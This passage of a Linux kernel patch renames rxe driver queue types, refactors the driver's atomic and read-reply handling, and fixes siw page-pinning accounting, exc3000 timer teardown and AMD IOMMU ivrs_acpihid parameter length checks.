+- *				read by client. Used by kernel client only.
++ *				read by rxe driver.
++ *				Used by rxe internals only.
++ * @QUEUE_TYPE_FROM_ULP:	Queue is written by kernel ulp and
++ *				read by rxe driver.
++ *				Used by kernel verbs APIs only on
++ *				behalf of ulps.
++ * @QUEUE_TYPE_TO_ULP:		Queue is written by rxe driver and
++ *				read by kernel ulp.
++ *				Used by kernel verbs APIs only on
++ *				behalf of ulps.
+  */
+ enum queue_type {
+ 	QUEUE_TYPE_TO_CLIENT,
+ 	QUEUE_TYPE_FROM_CLIENT,
+-	QUEUE_TYPE_TO_DRIVER,
+-	QUEUE_TYPE_FROM_DRIVER,
++	QUEUE_TYPE_FROM_ULP,
++	QUEUE_TYPE_TO_ULP,
+ };
+ 
+ struct rxe_queue_buf;
+@@ -62,9 +69,9 @@ struct rxe_queue {
+ 	u32			index_mask;
+ 	enum queue_type		type;
+ 	/* private copy of index for shared queues between
+-	 * kernel space and user space. Kernel reads and writes
++	 * driver and clients. Driver reads and writes
+ 	 * this copy and then replicates to rxe_queue_buf
+-	 * for read access by user space.
++	 * for read access by clients.
+ 	 */
+ 	u32			index;
+ };
+@@ -97,19 +104,21 @@ static inline u32 queue_get_producer(const struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		/* protect user index */
++		/* used by rxe, client owns the index */
+ 		prod = smp_load_acquire(&q->buf->producer_index);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
++		/* used by rxe which owns the index */
+ 		prod = q->index;
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		/* protect driver index */
+-		prod = smp_load_acquire(&q->buf->producer_index);
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp which owns the index */
+ 		prod = q->buf->producer_index;
+ 		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp, rxe owns the index */
++		prod = smp_load_acquire(&q->buf->producer_index);
++		break;
+ 	}
+ 
+ 	return prod;
+@@ -122,19 +131,21 @@ static inline u32 queue_get_consumer(const struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
++		/* used by rxe which owns the index */
+ 		cons = q->index;
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
+-		/* protect user index */
++		/* used by rxe, client owns the index */
+ 		cons = smp_load_acquire(&q->buf->consumer_index);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		cons = q->buf->consumer_index;
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
+-		/* protect driver index */
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp, rxe owns the index */
+ 		cons = smp_load_acquire(&q->buf->consumer_index);
+ 		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp which owns the index */
++		cons = q->buf->consumer_index;
++		break;
+ 	}
+ 
+ 	return cons;
+@@ -172,24 +183,31 @@ static inline void queue_advance_producer(struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		pr_warn("%s: attempt to advance client index\n",
+-			__func__);
++		/* used by rxe, client owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance client index\n",
++				__func__);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
++		/* used by rxe which owns the index */
+ 		prod = q->index;
+ 		prod = (prod + 1) & q->index_mask;
+ 		q->index = prod;
+-		/* protect user index */
++		/* release so client can read it safely */
+ 		smp_store_release(&q->buf->producer_index, prod);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		pr_warn("%s: attempt to advance driver index\n",
+-			__func__);
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp which owns the index */
+ 		prod = q->buf->producer_index;
+ 		prod = (prod + 1) & q->index_mask;
+-		q->buf->producer_index = prod;
++		/* release so rxe can read it safely */
++		smp_store_release(&q->buf->producer_index, prod);
++		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp, rxe owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance driver index\n",
++				__func__);
+ 		break;
+ 	}
+ }
+@@ -201,24 +219,30 @@ static inline void queue_advance_consumer(struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		cons = q->index;
+-		cons = (cons + 1) & q->index_mask;
++		/* used by rxe which owns the index */
++		cons = (q->index + 1) & q->index_mask;
+ 		q->index = cons;
+-		/* protect user index */
++		/* release so client can read it safely */
+ 		smp_store_release(&q->buf->consumer_index, cons);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
+-		pr_warn("%s: attempt to advance client index\n",
+-			__func__);
++		/* used by rxe, client owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance client index\n",
++				__func__);
++		break;
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp, rxe owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance driver index\n",
++				__func__);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp which owns the index */
+ 		cons = q->buf->consumer_index;
+ 		cons = (cons + 1) & q->index_mask;
+-		q->buf->consumer_index = cons;
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
+-		pr_warn("%s: attempt to advance driver index\n",
+-			__func__);
++		/* release so rxe can read it safely */
++		smp_store_release(&q->buf->consumer_index, cons);
+ 		break;
+ 	}
+ }
+diff --git a/drivers/infiniband/sw/rxe/rxe_resp.c b/drivers/infiniband/sw/rxe/rxe_resp.c
+index c74972244f08f..0cc1ba91d48cc 100644
+--- a/drivers/infiniband/sw/rxe/rxe_resp.c
++++ b/drivers/infiniband/sw/rxe/rxe_resp.c
+@@ -10,43 +10,6 @@
+ #include "rxe_loc.h"
+ #include "rxe_queue.h"
+ 
+-enum resp_states {
+-	RESPST_NONE,
+-	RESPST_GET_REQ,
+-	RESPST_CHK_PSN,
+-	RESPST_CHK_OP_SEQ,
+-	RESPST_CHK_OP_VALID,
+-	RESPST_CHK_RESOURCE,
+-	RESPST_CHK_LENGTH,
+-	RESPST_CHK_RKEY,
+-	RESPST_EXECUTE,
+-	RESPST_READ_REPLY,
+-	RESPST_ATOMIC_REPLY,
+-	RESPST_ATOMIC_WRITE_REPLY,
+-	RESPST_PROCESS_FLUSH,
+-	RESPST_COMPLETE,
+-	RESPST_ACKNOWLEDGE,
+-	RESPST_CLEANUP,
+-	RESPST_DUPLICATE_REQUEST,
+-	RESPST_ERR_MALFORMED_WQE,
+-	RESPST_ERR_UNSUPPORTED_OPCODE,
+-	RESPST_ERR_MISALIGNED_ATOMIC,
+-	RESPST_ERR_PSN_OUT_OF_SEQ,
+-	RESPST_ERR_MISSING_OPCODE_FIRST,
+-	RESPST_ERR_MISSING_OPCODE_LAST_C,
+-	RESPST_ERR_MISSING_OPCODE_LAST_D1E,
+-	RESPST_ERR_TOO_MANY_RDMA_ATM_REQ,
+-	RESPST_ERR_RNR,
+-	RESPST_ERR_RKEY_VIOLATION,
+-	RESPST_ERR_INVALIDATE_RKEY,
+-	RESPST_ERR_LENGTH,
+-	RESPST_ERR_CQ_OVERFLOW,
+-	RESPST_ERROR,
+-	RESPST_RESET,
+-	RESPST_DONE,
+-	RESPST_EXIT,
+-};
+-
+ static char *resp_state_name[] = {
+ 	[RESPST_NONE]				= "NONE",
+ 	[RESPST_GET_REQ]			= "GET_REQ",
+@@ -457,13 +420,23 @@ static enum resp_states rxe_resp_check_length(struct rxe_qp *qp,
+ 	return RESPST_CHK_RKEY;
+ }
+ 
++/* if the reth length field is zero we can assume nothing
++ * about the rkey value and should not validate or use it.
++ * Instead set qp->resp.rkey to 0 which is an invalid rkey
++ * value since the minimum index part is 1.
++ */
+ static void qp_resp_from_reth(struct rxe_qp *qp, struct rxe_pkt_info *pkt)
+ {
++	unsigned int length = reth_len(pkt);
++
+ 	qp->resp.va = reth_va(pkt);
+ 	qp->resp.offset = 0;
+-	qp->resp.rkey = reth_rkey(pkt);
+-	qp->resp.resid = reth_len(pkt);
+-	qp->resp.length = reth_len(pkt);
++	qp->resp.resid = length;
++	qp->resp.length = length;
++	if (pkt->mask & RXE_READ_OR_WRITE_MASK && length == 0)
++		qp->resp.rkey = 0;
++	else
++		qp->resp.rkey = reth_rkey(pkt);
+ }
+ 
+ static void qp_resp_from_atmeth(struct rxe_qp *qp, struct rxe_pkt_info *pkt)
+@@ -474,6 +447,10 @@ static void qp_resp_from_atmeth(struct rxe_qp *qp, struct rxe_pkt_info *pkt)
+ 	qp->resp.resid = sizeof(u64);
+ }
+ 
++/* resolve the packet rkey to qp->resp.mr or set qp->resp.mr to NULL
++ * if an invalid rkey is received or the rdma length is zero. For middle
++ * or last packets use the stored value of mr.
++ */
+ static enum resp_states check_rkey(struct rxe_qp *qp,
+ 				   struct rxe_pkt_info *pkt)
+ {
+@@ -510,10 +487,12 @@ static enum resp_states check_rkey(struct rxe_qp *qp,
+ 		return RESPST_EXECUTE;
+ 	}
+ 
+-	/* A zero-byte op is not required to set an addr or rkey. See C9-88 */
++	/* A zero-byte read or write op is not required to
++	 * set an addr or rkey. See C9-88
++	 */
+ 	if ((pkt->mask & RXE_READ_OR_WRITE_MASK) &&
+-	    (pkt->mask & RXE_RETH_MASK) &&
+-	    reth_len(pkt) == 0) {
++	    (pkt->mask & RXE_RETH_MASK) && reth_len(pkt) == 0) {
++		qp->resp.mr = NULL;
+ 		return RESPST_EXECUTE;
+ 	}
+ 
+@@ -592,6 +571,7 @@ skip_check_range:
+ 	return RESPST_EXECUTE;
+ 
+ err:
++	qp->resp.mr = NULL;
+ 	if (mr)
+ 		rxe_put(mr);
+ 	if (mw)
+@@ -725,17 +705,12 @@ static enum resp_states process_flush(struct rxe_qp *qp,
+ 	return RESPST_ACKNOWLEDGE;
+ }
+ 
+-/* Guarantee atomicity of atomic operations at the machine level. */
+-static DEFINE_SPINLOCK(atomic_ops_lock);
+-
+ static enum resp_states atomic_reply(struct rxe_qp *qp,
+-					 struct rxe_pkt_info *pkt)
++				     struct rxe_pkt_info *pkt)
+ {
+-	u64 *vaddr;
+-	enum resp_states ret;
+ 	struct rxe_mr *mr = qp->resp.mr;
+ 	struct resp_res *res = qp->resp.res;
+-	u64 value;
++	int err;
+ 
+ 	if (!res) {
+ 		res = rxe_prepare_res(qp, pkt, RXE_ATOMIC_MASK);
+@@ -743,32 +718,14 @@ static enum resp_states atomic_reply(struct rxe_qp *qp,
+ 	}
+ 
+ 	if (!res->replay) {
+-		if (mr->state != RXE_MR_STATE_VALID) {
+-			ret = RESPST_ERR_RKEY_VIOLATION;
+-			goto out;
+-		}
+-
+-		vaddr = iova_to_vaddr(mr, qp->resp.va + qp->resp.offset,
+-					sizeof(u64));
+-
+-		/* check vaddr is 8 bytes aligned. */
+-		if (!vaddr || (uintptr_t)vaddr & 7) {
+-			ret = RESPST_ERR_MISALIGNED_ATOMIC;
+-			goto out;
+-		}
++		u64 iova = qp->resp.va + qp->resp.offset;
+ 
+-		spin_lock_bh(&atomic_ops_lock);
+-		res->atomic.orig_val = value = *vaddr;
+-
+-		if (pkt->opcode == IB_OPCODE_RC_COMPARE_SWAP) {
+-			if (value == atmeth_comp(pkt))
+-				value = atmeth_swap_add(pkt);
+-		} else {
+-			value += atmeth_swap_add(pkt);
+-		}
+-
+-		*vaddr = value;
+-		spin_unlock_bh(&atomic_ops_lock);
++		err = rxe_mr_do_atomic_op(mr, iova, pkt->opcode,
++					  atmeth_comp(pkt),
++					  atmeth_swap_add(pkt),
++					  &res->atomic.orig_val);
++		if (err)
++			return err;
+ 
+ 		qp->resp.msn++;
+ 
+@@ -780,35 +737,35 @@ static enum resp_states atomic_reply(struct rxe_qp *qp,
+ 		qp->resp.status = IB_WC_SUCCESS;
+ 	}
+ 
+-	ret = RESPST_ACKNOWLEDGE;
+-out:
+-	return ret;
++	return RESPST_ACKNOWLEDGE;
+ }
+ 
+-#ifdef CONFIG_64BIT
+-static enum resp_states do_atomic_write(struct rxe_qp *qp,
+-					struct rxe_pkt_info *pkt)
++static enum resp_states atomic_write_reply(struct rxe_qp *qp,
++					   struct rxe_pkt_info *pkt)
+ {
+-	struct rxe_mr *mr = qp->resp.mr;
+-	int payload = payload_size(pkt);
+-	u64 src, *dst;
+-
+-	if (mr->state != RXE_MR_STATE_VALID)
+-		return RESPST_ERR_RKEY_VIOLATION;
++	struct resp_res *res = qp->resp.res;
++	struct rxe_mr *mr;
++	u64 value;
++	u64 iova;
++	int err;
+ 
+-	memcpy(&src, payload_addr(pkt), payload);
++	if (!res) {
++		res = rxe_prepare_res(qp, pkt, RXE_ATOMIC_WRITE_MASK);
++		qp->resp.res = res;
++	}
+ 
+-	dst = iova_to_vaddr(mr, qp->resp.va + qp->resp.offset, payload);
+-	/* check vaddr is 8 bytes aligned. */
+-	if (!dst || (uintptr_t)dst & 7)
+-		return RESPST_ERR_MISALIGNED_ATOMIC;
++	if (res->replay)
++		return RESPST_ACKNOWLEDGE;
+ 
+-	/* Do atomic write after all prior operations have completed */
+-	smp_store_release(dst, src);
++	mr = qp->resp.mr;
++	value = *(u64 *)payload_addr(pkt);
++	iova = qp->resp.va + qp->resp.offset;
+ 
+-	/* decrease resp.resid to zero */
+-	qp->resp.resid -= sizeof(payload);
++	err = rxe_mr_do_atomic_write(mr, iova, value);
++	if (err)
++		return err;
+ 
++	qp->resp.resid = 0;
+ 	qp->resp.msn++;
+ 
+ 	/* next expected psn, read handles this separately */
+@@ -817,29 +774,8 @@ static enum resp_states do_atomic_write(struct rxe_qp *qp,
+ 
+ 	qp->resp.opcode = pkt->opcode;
+ 	qp->resp.status = IB_WC_SUCCESS;
+-	return RESPST_ACKNOWLEDGE;
+-}
+-#else
+-static enum resp_states do_atomic_write(struct rxe_qp *qp,
+-					struct rxe_pkt_info *pkt)
+-{
+-	return RESPST_ERR_UNSUPPORTED_OPCODE;
+-}
+-#endif /* CONFIG_64BIT */
+ 
+-static enum resp_states atomic_write_reply(struct rxe_qp *qp,
+-					   struct rxe_pkt_info *pkt)
+-{
+-	struct resp_res *res = qp->resp.res;
+-
+-	if (!res) {
+-		res = rxe_prepare_res(qp, pkt, RXE_ATOMIC_WRITE_MASK);
+-		qp->resp.res = res;
+-	}
+-
+-	if (res->replay)
+-		return RESPST_ACKNOWLEDGE;
+-	return do_atomic_write(qp, pkt);
++	return RESPST_ACKNOWLEDGE;
+ }
+ 
+ static struct sk_buff *prepare_ack_packet(struct rxe_qp *qp,
+@@ -966,7 +902,11 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 	}
+ 
+ 	if (res->state == rdatm_res_state_new) {
+-		if (!res->replay) {
++		if (!res->replay || qp->resp.length == 0) {
++			/* if length == 0 mr will be NULL (is ok)
++			 * otherwise qp->resp.mr holds a ref on mr
++			 * which we transfer to mr and drop below.
++			 */
+ 			mr = qp->resp.mr;
+ 			qp->resp.mr = NULL;
+ 		} else {
+@@ -980,6 +920,10 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 		else
+ 			opcode = IB_OPCODE_RC_RDMA_READ_RESPONSE_FIRST;
+ 	} else {
++		/* re-lookup mr from rkey on all later packets.
++		 * length will be non-zero. This can fail if someone
++		 * modifies or destroys the mr since the first packet.
++		 */
+ 		mr = rxe_recheck_mr(qp, res->read.rkey);
+ 		if (!mr)
+ 			return RESPST_ERR_RKEY_VIOLATION;
+@@ -997,18 +941,16 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 	skb = prepare_ack_packet(qp, &ack_pkt, opcode, payload,
+ 				 res->cur_psn, AETH_ACK_UNLIMITED);
+ 	if (!skb) {
+-		if (mr)
+-			rxe_put(mr);
+-		return RESPST_ERR_RNR;
++		state = RESPST_ERR_RNR;
++		goto err_out;
+ 	}
+ 
+ 	err = rxe_mr_copy(mr, res->read.va, payload_addr(&ack_pkt),
+ 			  payload, RXE_FROM_MR_OBJ);
+-	if (mr)
+-		rxe_put(mr);
+ 	if (err) {
+ 		kfree_skb(skb);
+-		return RESPST_ERR_RKEY_VIOLATION;
++		state = RESPST_ERR_RKEY_VIOLATION;
++		goto err_out;
+ 	}
+ 
+ 	if (bth_pad(&ack_pkt)) {
+@@ -1017,9 +959,12 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 		memset(pad, 0, bth_pad(&ack_pkt));
+ 	}
+ 
++	/* rxe_xmit_packet always consumes the skb */
+ 	err = rxe_xmit_packet(qp, &ack_pkt, skb);
+-	if (err)
+-		return RESPST_ERR_RNR;
++	if (err) {
++		state = RESPST_ERR_RNR;
++		goto err_out;
++	}
+ 
+ 	res->read.va += payload;
+ 	res->read.resid -= payload;
+@@ -1036,6 +981,9 @@ static enum resp_states read_reply(struct rxe_qp *qp,
+ 		state = RESPST_CLEANUP;
+ 	}
+ 
++err_out:
++	if (mr)
++		rxe_put(mr);
+ 	return state;
+ }
+ 
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index 025b35bf014e2..a3aee247aa157 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -245,7 +245,7 @@ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ 	int num_sge = ibwr->num_sge;
+ 	int full;
+ 
+-	full = queue_full(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	full = queue_full(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 	if (unlikely(full))
+ 		return -ENOMEM;
+ 
+@@ -256,7 +256,7 @@ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ 	for (i = 0; i < num_sge; i++)
+ 		length += ibwr->sg_list[i].length;
+ 
+-	recv_wqe = queue_producer_addr(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	recv_wqe = queue_producer_addr(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 	recv_wqe->wr_id = ibwr->wr_id;
+ 
+ 	memcpy(recv_wqe->dma.sge, ibwr->sg_list,
+@@ -268,7 +268,7 @@ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ 	recv_wqe->dma.cur_sge		= 0;
+ 	recv_wqe->dma.sge_offset	= 0;
+ 
+-	queue_advance_producer(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	queue_advance_producer(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	return 0;
+ }
+@@ -623,17 +623,17 @@ static int post_one_send(struct rxe_qp *qp, const struct ib_send_wr *ibwr,
+ 
+ 	spin_lock_irqsave(&qp->sq.sq_lock, flags);
+ 
+-	full = queue_full(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	full = queue_full(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	if (unlikely(full)) {
+ 		spin_unlock_irqrestore(&qp->sq.sq_lock, flags);
+ 		return -ENOMEM;
+ 	}
+ 
+-	send_wqe = queue_producer_addr(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	send_wqe = queue_producer_addr(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 	init_send_wqe(qp, ibwr, mask, length, send_wqe);
+ 
+-	queue_advance_producer(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	queue_advance_producer(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	spin_unlock_irqrestore(&qp->sq.sq_lock, flags);
+ 
+@@ -821,12 +821,12 @@ static int rxe_poll_cq(struct ib_cq *ibcq, int num_entries, struct ib_wc *wc)
+ 
+ 	spin_lock_irqsave(&cq->cq_lock, flags);
+ 	for (i = 0; i < num_entries; i++) {
+-		cqe = queue_head(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++		cqe = queue_head(cq->queue, QUEUE_TYPE_TO_ULP);
+ 		if (!cqe)
+ 			break;
+ 
+ 		memcpy(wc++, &cqe->ibwc, sizeof(*wc));
+-		queue_advance_consumer(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++		queue_advance_consumer(cq->queue, QUEUE_TYPE_TO_ULP);
+ 	}
+ 	spin_unlock_irqrestore(&cq->cq_lock, flags);
+ 
+@@ -838,7 +838,7 @@ static int rxe_peek_cq(struct ib_cq *ibcq, int wc_cnt)
+ 	struct rxe_cq *cq = to_rcq(ibcq);
+ 	int count;
+ 
+-	count = queue_count(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++	count = queue_count(cq->queue, QUEUE_TYPE_TO_ULP);
+ 
+ 	return (count > wc_cnt) ? wc_cnt : count;
+ }
+@@ -854,7 +854,7 @@ static int rxe_req_notify_cq(struct ib_cq *ibcq, enum ib_cq_notify_flags flags)
+ 	if (cq->notify != IB_CQ_NEXT_COMP)
+ 		cq->notify = flags & IB_CQ_SOLICITED_MASK;
+ 
+-	empty = queue_empty(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++	empty = queue_empty(cq->queue, QUEUE_TYPE_TO_ULP);
+ 
+ 	if ((flags & IB_CQ_REPORT_MISSED_EVENTS) && !empty)
+ 		ret = 1;
+@@ -948,42 +948,6 @@ err1:
+ 	return ERR_PTR(err);
+ }
+ 
+-static int rxe_set_page(struct ib_mr *ibmr, u64 addr)
+-{
+-	struct rxe_mr *mr = to_rmr(ibmr);
+-	struct rxe_map *map;
+-	struct rxe_phys_buf *buf;
+-
+-	if (unlikely(mr->nbuf == mr->num_buf))
+-		return -ENOMEM;
+-
+-	map = mr->map[mr->nbuf / RXE_BUF_PER_MAP];
+-	buf = &map->buf[mr->nbuf % RXE_BUF_PER_MAP];
+-
+-	buf->addr = addr;
+-	buf->size = ibmr->page_size;
+-	mr->nbuf++;
+-
+-	return 0;
+-}
+-
+-static int rxe_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg,
+-			 int sg_nents, unsigned int *sg_offset)
+-{
+-	struct rxe_mr *mr = to_rmr(ibmr);
+-	int n;
+-
+-	mr->nbuf = 0;
+-
+-	n = ib_sg_to_pages(ibmr, sg, sg_nents, sg_offset, rxe_set_page);
+-
+-	mr->page_shift = ilog2(ibmr->page_size);
+-	mr->page_mask = ibmr->page_size - 1;
+-	mr->offset = ibmr->iova & mr->page_mask;
+-
+-	return n;
+-}
+-
+ static ssize_t parent_show(struct device *device,
+ 			   struct device_attribute *attr, char *buf)
+ {
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.h b/drivers/infiniband/sw/rxe/rxe_verbs.h
+index 19ddfa8904803..c269ae2a32243 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.h
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.h
+@@ -283,17 +283,6 @@ enum rxe_mr_lookup_type {
+ 	RXE_LOOKUP_REMOTE,
+ };
+ 
+-#define RXE_BUF_PER_MAP		(PAGE_SIZE / sizeof(struct rxe_phys_buf))
+-
+-struct rxe_phys_buf {
+-	u64      addr;
+-	u64      size;
+-};
+-
+-struct rxe_map {
+-	struct rxe_phys_buf	buf[RXE_BUF_PER_MAP];
+-};
+-
+ static inline int rkey_is_mw(u32 rkey)
+ {
+ 	u32 index = rkey >> 8;
+@@ -310,25 +299,24 @@ struct rxe_mr {
+ 	u32			lkey;
+ 	u32			rkey;
+ 	enum rxe_mr_state	state;
+-	u32			offset;
+ 	int			access;
++	atomic_t		num_mw;
+ 
+-	int			page_shift;
+-	int			page_mask;
+-	int			map_shift;
+-	int			map_mask;
++	unsigned int		page_offset;
++	unsigned int		page_shift;
++	u64			page_mask;
+ 
+ 	u32			num_buf;
+ 	u32			nbuf;
+ 
+-	u32			max_buf;
+-	u32			num_map;
+-
+-	atomic_t		num_mw;
+-
+-	struct rxe_map		**map;
++	struct xarray		page_list;
+ };
+ 
++static inline unsigned int mr_page_size(struct rxe_mr *mr)
++{
++	return mr ? mr->ibmr.page_size : PAGE_SIZE;
++}
++
+ enum rxe_mw_state {
+ 	RXE_MW_STATE_INVALID	= RXE_MR_STATE_INVALID,
+ 	RXE_MW_STATE_FREE	= RXE_MR_STATE_FREE,
+diff --git a/drivers/infiniband/sw/siw/siw_mem.c b/drivers/infiniband/sw/siw/siw_mem.c
+index b2b33dd3b4fa1..f51ab2ccf1511 100644
+--- a/drivers/infiniband/sw/siw/siw_mem.c
++++ b/drivers/infiniband/sw/siw/siw_mem.c
+@@ -398,7 +398,7 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 
+ 	mlock_limit = rlimit(RLIMIT_MEMLOCK) >> PAGE_SHIFT;
+ 
+-	if (num_pages + atomic64_read(&mm_s->pinned_vm) > mlock_limit) {
++	if (atomic64_add_return(num_pages, &mm_s->pinned_vm) > mlock_limit) {
+ 		rv = -ENOMEM;
+ 		goto out_sem_up;
+ 	}
+@@ -411,30 +411,27 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 		goto out_sem_up;
+ 	}
+ 	for (i = 0; num_pages; i++) {
+-		int got, nents = min_t(int, num_pages, PAGES_PER_CHUNK);
+-
+-		umem->page_chunk[i].plist =
++		int nents = min_t(int, num_pages, PAGES_PER_CHUNK);
++		struct page **plist =
+ 			kcalloc(nents, sizeof(struct page *), GFP_KERNEL);
+-		if (!umem->page_chunk[i].plist) {
++
++		if (!plist) {
+ 			rv = -ENOMEM;
+ 			goto out_sem_up;
+ 		}
+-		got = 0;
++		umem->page_chunk[i].plist = plist;
+ 		while (nents) {
+-			struct page **plist = &umem->page_chunk[i].plist[got];
+-
+ 			rv = pin_user_pages(first_page_va, nents, foll_flags,
+ 					    plist, NULL);
+ 			if (rv < 0)
+ 				goto out_sem_up;
+ 
+ 			umem->num_pages += rv;
+-			atomic64_add(rv, &mm_s->pinned_vm);
+ 			first_page_va += rv * PAGE_SIZE;
++			plist += rv;
+ 			nents -= rv;
+-			got += rv;
++			num_pages -= rv;
+ 		}
+-		num_pages -= got;
+ 	}
+ out_sem_up:
+ 	mmap_read_unlock(mm_s);
+@@ -442,6 +439,10 @@ out_sem_up:
+ 	if (rv > 0)
+ 		return umem;
+ 
++	/* Adjust accounting for pages not pinned */
++	if (num_pages)
++		atomic64_sub(num_pages, &mm_s->pinned_vm);
++
+ 	siw_umem_release(umem, false);
+ 
+ 	return ERR_PTR(rv);
+diff --git a/drivers/input/touchscreen/exc3000.c b/drivers/input/touchscreen/exc3000.c
+index 4b7eee01c6aad..69eae79e2087c 100644
+--- a/drivers/input/touchscreen/exc3000.c
++++ b/drivers/input/touchscreen/exc3000.c
+@@ -109,6 +109,11 @@ static inline void exc3000_schedule_timer(struct exc3000_data *data)
+ 	mod_timer(&data->timer, jiffies + msecs_to_jiffies(EXC3000_TIMEOUT_MS));
+ }
+ 
++static void exc3000_shutdown_timer(void *timer)
++{
++	timer_shutdown_sync(timer);
++}
++
+ static int exc3000_read_frame(struct exc3000_data *data, u8 *buf)
+ {
+ 	struct i2c_client *client = data->client;
+@@ -386,6 +391,11 @@ static int exc3000_probe(struct i2c_client *client)
+ 	if (error)
+ 		return error;
+ 
++	error = devm_add_action_or_reset(&client->dev, exc3000_shutdown_timer,
++					 &data->timer);
++	if (error)
++		return error;
++
+ 	error = devm_request_threaded_irq(&client->dev, client->irq,
+ 					  NULL, exc3000_interrupt, IRQF_ONESHOT,
+ 					  client->name, data);
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index 467b194975b30..19a46b9f73574 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -3475,15 +3475,26 @@ found:
+ 	return 1;
+ }
+ 
++#define ACPIID_LEN (ACPIHID_UID_LEN + ACPIHID_HID_LEN)
++
+ static int __init parse_ivrs_acpihid(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+ 	char *hid, *uid, *p, *addr;
+-	char acpiid[ACPIHID_UID_LEN + ACPIHID_HID_LEN] = {0};
++	char acpiid[ACPIID_LEN] = {0};
+ 	int i;
+ 
+ 	addr = strchr(str, '@');
+ 	if (!addr) {
++		addr = strchr(str, '=');
++		if (!addr)
++			goto not_found;
++
++		++addr;
++
++		if (strlen(addr) > ACPIID_LEN)
++			goto not_found;
++
+ 		if (sscanf(str, "[%x:%x.%x]=%s", &bus, &dev, &fn, acpiid) == 4 ||
+ 		    sscanf(str, "[%x:%x:%x.%x]=%s", &seg, &bus, &dev, &fn, acpiid) == 5) {
+ 			pr_warn("ivrs_acpihid%s option format deprecated; use ivrs_acpihid=%s@%04x:%02x:%02x.%d instead\n",
+@@ -3496,6 +3507,9 @@ static int __init parse_ivrs_acpihid(char *str)
+ 	/* We have the '@', make it the terminator to get just the acpiid */
+ 	*addr++ = 0;
+ 
++	if (strlen(str) > ACPIID_LEN + 1)
++		goto not_found;
++
+ 	if (sscanf(str, "=%s", acpiid) != 1)
+ 		goto not_found;
+ 
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index cbeaab55c0dbc..ff4f3d4da3402 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -558,6 +558,15 @@ static void amd_iommu_report_page_fault(struct amd_iommu *iommu,
+ 		 * prevent logging it.
+ 		 */
+ 		if (IS_IOMMU_MEM_TRANSACTION(flags)) {
++			/* Device not attached to domain properly */
++			if (dev_data->domain == NULL) {
++				pr_err_ratelimited("Event logged [Device not attached to domain properly]\n");
++				pr_err_ratelimited("  device=%04x:%02x:%02x.%x domain=0x%04x\n",
++						   iommu->pci_seg->id, PCI_BUS_NUM(devid), PCI_SLOT(devid),
